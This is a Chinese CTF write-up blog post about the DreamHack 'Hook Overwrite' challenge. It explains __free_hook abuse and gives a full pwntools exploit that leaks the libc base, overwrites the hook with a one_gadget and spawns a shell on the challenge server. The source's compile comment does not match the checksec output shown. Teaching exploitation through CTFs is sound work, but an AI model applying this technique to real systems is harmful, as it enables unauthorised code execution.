【How2Pwn】DreamHack 中的Hook Overwrite问题

于 2022-09-25 17:57:11 发布
阅读量563 收藏 1
点赞数
分类专栏: How2Pwn 文章标签: c语言 开发语言 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jeongon/article/details/126993822
版权

0x00 源代码

// gcc -o init_fini_array init_fini_array.c -Wl,-z,norelro
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int main(int argc, char *argv[]) {
    long *ptr;
    size_t size;

    initialize();

    printf("stdout: %p\n", stdout);

    printf("Size: ");
    scanf("%ld", &size);

    ptr = malloc(size);

    printf("Data: ");
    read(0, ptr, size);

    *(long *)*ptr = *(ptr+1);
   
    free(ptr);
    free(ptr);

    system("/bin/sh");
    return 0;
}

原题链接

0x01 查看代码状态和保护机制

$ checksec ./hook
[*] '/home/ni/workspace/dreamhack/pie/hook'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

这里我们可以看见除了PIE,其他的保护机制都处于开启的状态。

什么是PIE?

PIE是指即使映射到随机地址上也可以运行的可执行程序。原来只有ASLR开启时,堆栈,公用库的地址会被随机映射,但是 main 函数的地址是不会随机映射的,这也就导致可以使用 ROP 通过 gadget 的方式利用原有的代码来制作恶意代码。但是PIE开启时main函数地址也会随机映射,所以不能得到 gadget 使用ROP,这时候就要选择其他的办法进行攻击。

什么是Hook,为什么要知道?

钩子编程(hooking),也称作“挂钩”,是计算机程序设计术语,指通过拦截软件模块(英语:Modular programming)间的函数调用、消息传递、事件传递来修改或扩展操作系统、应用程序或其他软件组件的行为的各种技术。处理被拦截的函数调用、事件、消息的代码,被称为钩子(hook)。

钩子在编程中很常见,在函数中用于监视函数,也可以在函数中增加功能等。比如在free, malloc函数中植入钩子可以监视软件内存的释放和分配。

想要绕过PIE保护机制,其中可以使用的一种方式就是Hook Overwrite。可以将钩子植入free, melloc。使得这类函数在调用时,可以执行自己写的恶意代码。这样不需要绕过canary,即使Full RELRO开启可以写入libc。

Hook的弱点

在libc中有很多为了debug存在的函数。例如__malloc_hook,系统会先检查是不是NULL,如果不是的话就继续调用malloc函数。同理free,realloc等函数也有与之对应的hook函数。

通而这些钩子函数都被定义在libc.so中,而且是bss段中。bss段中的数据都是有可写权力的,也就是说可以操作里面的变量。

0x02 分析代码

现在看回源代码,可以看到题目给了stdout的地址,然后自己分配一块内存并且在其中存入自定数据,最后通过free函数释放掉自己分配的内存。这里我们可以通过用system函数的地址覆盖掉free函数的地址,达到目的。但是具体要怎么覆盖free函数,要看下面这串代码。

*(long *)*ptr = *(ptr+1);

这是一个双重指针,目的是将ptr[0]中的值换成ptr[1]中的值。如果在ptr[0]中存入_free_hook,在ptr[1]中存入system函数的地址,就可以将_free_hook指向free函数的指针转变成指向system函数的指针。如此操作,下次free(ptr)的时候实际调用的是system函数

0x03 设计payload

1. 利用stdout地址计算出system函数的地址

方式和之前ROP的几章方法完全一致,这里直接给出代码供参考。但是需要注意stdout函数的地址,不能直接使用symbols[“stdout”],而是要用标准库中的 == _IO_2_1_stdout==

from pwn import*
def slog(n,m): return success(": ".join([n,hex(m)]))

#p = process("./hook")
p = remote("host3.dreamhack.games", 19151)
e = ELF("./hook")
libc = ELF("libc.so.6")

#[1] leak base
p.recvuntil("stdout: ")
leak = int(p.recv(14),16)
lb = leak - libc.symbols["_IO_2_1_stdout_"]
hook = lb + libc.symbols["__free_hook"]

slog("leak base", lb)
slog("hook", hook)

运行一下,结果如下

hook.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil("stdout: ")
[+] leak base: 0x7f02d924d000
[+] hook: 0x7f02d96137a8

可以看到成功得到了hook的地址。

2. hook中写入one gadget

在hook地址上用one gadget覆盖,这样就可以直接get shell了。同时生成ptr的时候给一个大一点的值。至于one gadget是什么可以先参考一下这篇文章 glibc里的one gadget 解释的很详细。这个题目给定了一个库,所以可以直接在库中找到我们可以使用的one gadget

$ one_gadget ./libc.so.6
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

然后修改一下,加入找到的one gadget。

one_gadget = 0x4526a

magic = lb + one_gadget

payload = p64(hook) + p64(magic)
p.sendlineafter("Size: ", "400")
p.sendlineafter("Data: ", payload)

0x04 完整Exploit

from pwn import*
def slog(n,m): return success(": ".join([n,hex(m)]))

#p = process("./hook")
p = remote("host3.dreamhack.games", 12635)
e = ELF("./hook")
libc = ELF("libc.so.6")

one_gadget = 0x4526a

#[1] leak base
p.recvuntil("stdout: ")
leak = int(p.recv(14),16)
lb = leak - libc.symbols["_IO_2_1_stdout_"]
hook = lb + libc.symbols["__free_hook"]

slog("leak base", lb)
slog("hook", hook)

magic = lb + one_gadget

#[2]
payload = p64(hook) + p64(magic)
p.sendlineafter("Size: ", "400")
p.sendlineafter("Data: ", payload)

p.interactive()

运行结果

hook.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil("stdout: ")
[+] leak base: 0x7fbcef736000
[+] hook: 0x7fbcefafc7a8
hook.py:24: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter("Size: ", "400")
/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
$ ls
flag
hook

https://xz.aliyun.com/t/2720

头都大了了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN:partial overwrite
m0_53932372的博客
10-19 139
pwn
花式栈溢出技巧----partial overwrite
qq_42192672的博客
10-18 1190
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite                   https://bbs.ichunqiu.com/thread-43627-1-1.html                   https://www.jianshu.com/...
BUUCTF ciscn_2019_c_1
N1rvana的博客
11-14 3556
一道积攒了很久才解出来的题,这道题大体不难,但是好多小细节呜呜呜。而且Libcsearcher里的libc库没更新(上篇博客讲了)。 这道题是BUUCTF上的ciscn_2019_c_1。标准的64位ROP流程,我也就分享一下自己的坎坷心路历程。 代码审计 老规矩checksec一下,只开了nx保护。 观察main函数 显然哦,只有输入1才有点用。 关键函数:encrypt() 发现一个栈溢出漏洞。ROP链的入口。 然后就是读取s的长度,在长度范围内对内容进行加密:也就是根据ascii码范围不同来进行
How2Pwn】DreamHack x64下的ROP问题
Jeongon的博客
09-04 913
Pwn的ROP问题演示
我要学pwn.day12
weixin_45963786的博客
07-19 560
ciscn_2019_n_5 潜心修炼,从基础开始 这是一道简单的编写shellcode 解题流程 1.查看文件 $ file ciscn_2019_n_5 ciscn_2019_n_5: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9e420b4efe
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn题目的libc-2.27.so文件
04-11
做pwn题,有些时候题目不给这个文件,这里是这个库的文件。
ret2libc2pwn 入门题
02-11
pwn 入门题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
在exploits文件夹使用python3运行HTTP服务器。 $ python3 -m http.server 80 通过Safari使用攻击者服务器的IP访问网站: http://[attacker_ip]/exploit.html 等待计算器(通常会在十秒钟内弹出,但如果不走运,...
bytes-warning:无需访问解释器命令行参数即可设置python BytesWarning的实用程序
05-13
字节警告 在无法将参数传递给python解释器的环境(例如uwsgi),hack设置BytesWarning标志 安装 $ pip install bytes_warning 用法 import warnings, bytes_warning bytes_warning.set_flag(1) warnings.filterwarnings('default', category=BytesWarning) 执照 麻省理工学院
我要学pwn.day16
weixin_45963786的博客
07-30 3117
pwn2_sctf_2016 潜心修炼,从基础开始 这是一道整数溢出加ROP的题 解题流程 1.查看文件保护 checksec pwn2_sctf_2016 [*] '/home/ctf/Downloads/pwnexercise/bjdctf_2020_babyrop/pwn2_sctf_2016' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX
我要学pwn.day13
weixin_45963786的博客
07-20 1823
ciscn_2019_ne_5 潜心修炼,从基础开始 这是一道使用sh获得shell的题 解题流程 1.查看文件 $ file ciscn_2019_ne_5 ciscn_2019_ne_5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6482843cea0a0
Pwn 学习 question_5_plus_x64 ret2csu
MrTreebook的博客
05-01 348
Pwn 学习 question_5_plus_x64 ret2csu1.源代码2.源代码分析3._libc_csu_init 分析4.ROP编程5.ropper看以下gadget6.exp[点击跳转 libc database search](https://libc.blukat.me/)7.看一下效果所有源代码和程序以及调试程序都放在了gitee 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h>
payload模块使用(四)
weixin_43047908的博客
03-20 2339
介绍几种常见的payload,并且以漏洞利用的角度探讨它们的功能 bind shell   bind(绑定型)shell用于提供远程shell连接。在成功利用了目标主机上的安全漏洞后,并且成功执行了shellcode程序以后,渗透人员可在目标主机上的特定端口上运行bind shell,以让其他主机继续控制这台主机。攻击人员可以使用基于TCP连接的标准输入输出隧道工具(例如Netcat)连接带被攻破的主机,通过bind shell继续实施控制。它的应用场合与Telnet服务器/客户端十分相似,主要适用于以NA
我要学pwn.day15
weixin_45963786的博客
07-26 506
bjdctf_2020_babyrop 潜心修炼,从基础开始 这是一道基础ROP题 解题流程 1.查看文件保护 $ checksec bjdctf_2020_babyrop [*] '/home/ctf/Downloads/pwnexercise/2018_rop/bjdctf_2020_babyrop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX:
Python3学习(十五):python出现的error汇总
技术宅拯救世界
06-06 4178
1. TypeError: 'builtin_function_or_method' object is not iterable 迭代对象有错误,有可能迭代的是系统默认的一些变量或对象。例如for line in input: 2. UnicodeEncodeError: 'ascii' codec can't encode characters in... 文件的编码问题。pyth...
Python文件编码---gbk?OR utf8?
jiangxinyu的专栏
04-02 9656
Python文件编码---gbk?OR utf8? windows文件名的编码是cp936的,你在使用文文件名的时候转下码就行了。 比如你python文件编码是utf8 # -*- coding: utf-8 -*- he='开心.mp3' f=open(he.decode('utf-8').encode('cp936'),'w') f.close() ------------
成功解决TypeError: a bytes-like object is required, not 'str'
热门推荐
近期请国内外头部出版社可尽快私信博主!——心比天高,仗剑走天涯,保持热爱,奔赴向梦想!低调,谦虚,自律,反思,成长,还算是比较正能量的博主,公益免费传播……内心特别想在AI界做出一些可以推进历史进程影响力的东西(兴趣使然,有点小情怀,也有点使命感呀)…
11-07 13万+
成功解决TypeError: a bytes-like object is required, not 'str' 目录 解决问题 解决思路 解决方法 解决问题 TypeError: a bytes-like object is required, not 'str' 解决思路 问题出在python3.5和Python2.7在套接字返回值解...
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值